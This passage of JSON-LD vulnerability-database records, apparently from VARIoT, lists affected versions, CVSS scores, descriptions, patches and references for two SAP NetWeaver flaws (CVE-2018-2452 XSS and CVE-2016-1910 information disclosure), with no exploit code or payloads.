"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0959",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "application server java 7.10 to 7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "application server java 7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "application server java 7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "application server java 7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "application server java 7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "application server java 7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
}
],
"sources": [
{
"db": "BID",
"id": "105325"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2452"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "105325"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2452",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2452",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2452",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2452",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-559",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The logon application of SAP NetWeaver AS Java 7.10 to 7.11, 7.20, 7.30, 7.31, 7.40, 7.50 does not sufficiently encode user-controlled inputs, resulting in a cross-site scripting (XSS) vulnerability. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nSAP NetWeaver AS Java 7.10 through 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "BID",
"id": "105325"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2452",
"trust": 2.7
},
{
"db": "BID",
"id": "105325",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010218",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "105325"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"id": "VAR-201809-0959",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:43:33.694000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - September 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499356993"
},
{
"title": "SAP NetWeaver AS Java Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84829"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "NVD",
"id": "CVE-2018-2452"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499356993"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/105325"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2623846"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2452"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2452"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2623846"
}
],
"sources": [
{
"db": "BID",
"id": "105325"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "105325"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "BID",
"id": "105325"
},
{
"date": "2018-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"date": "2018-09-11T15:29:00.720000",
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"date": "2018-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "BID",
"id": "105325"
},
{
"date": "2018-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010218"
},
{
"date": "2021-04-20T19:13:18.270000",
"db": "NVD",
"id": "CVE-2018-2452"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010218"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-559"
}
],
"trust": 0.6
}
}
var-201601-0534
Vulnerability from variot
The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290. SAP Netweaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. SAP Netweaver 7.4 is vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0534",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "BID",
"id": "80920"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1910"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "80920"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1910",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-1910",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-1910",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-342",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-1910",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290. SAP Netweaver is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks. \nSAP Netweaver 7.4 is vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "BID",
"id": "80920"
},
{
"db": "VULMON",
"id": "CVE-2016-1910"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43495",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1910"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1910",
"trust": 2.8
},
{
"db": "BID",
"id": "80920",
"trust": 1.4
},
{
"db": "EXPLOIT-DB",
"id": "43495",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2016-1910",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"db": "BID",
"id": "80920"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"id": "VAR-201601-0534",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-26T23:01:19.759000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes January 2016 - Review (2191290)",
"trust": 0.8,
"url": "http://scn.sap.com/community/security/blog/2016/01/12/sap-security-notes-january-2016-review"
},
{
"title": "SAP NetWeaver User Management Engine Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=59660"
},
{
"title": "SAP_exploit",
"trust": 0.1,
"url": "https://github.com/vah13/sap_exploit "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/lnick2023/nicenice "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/qazbnm456/awesome-cve-poc "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "NVD",
"id": "CVE-2016-1910"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/80920"
},
{
"trust": 1.2,
"url": "https://www.exploit-db.com/exploits/43495/"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2016/apr/60"
},
{
"trust": 1.1,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1910"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1910"
},
{
"trust": 0.6,
"url": "http://erpscan.com/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/vah13/sap_exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"db": "BID",
"id": "80920"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"db": "BID",
"id": "80920"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-15T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"date": "2016-01-15T00:00:00",
"db": "BID",
"id": "80920"
},
{
"date": "2016-01-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001297"
},
{
"date": "2016-01-15T20:59:01.583000",
"db": "NVD",
"id": "CVE-2016-1910"
},
{
"date": "2016-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-342"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1910"
},
{
"date": "2016-09-02T19:00:00",
"db": "BID",
"id": "80920"
},
{
"date": "2016-01-26T00:00:00",
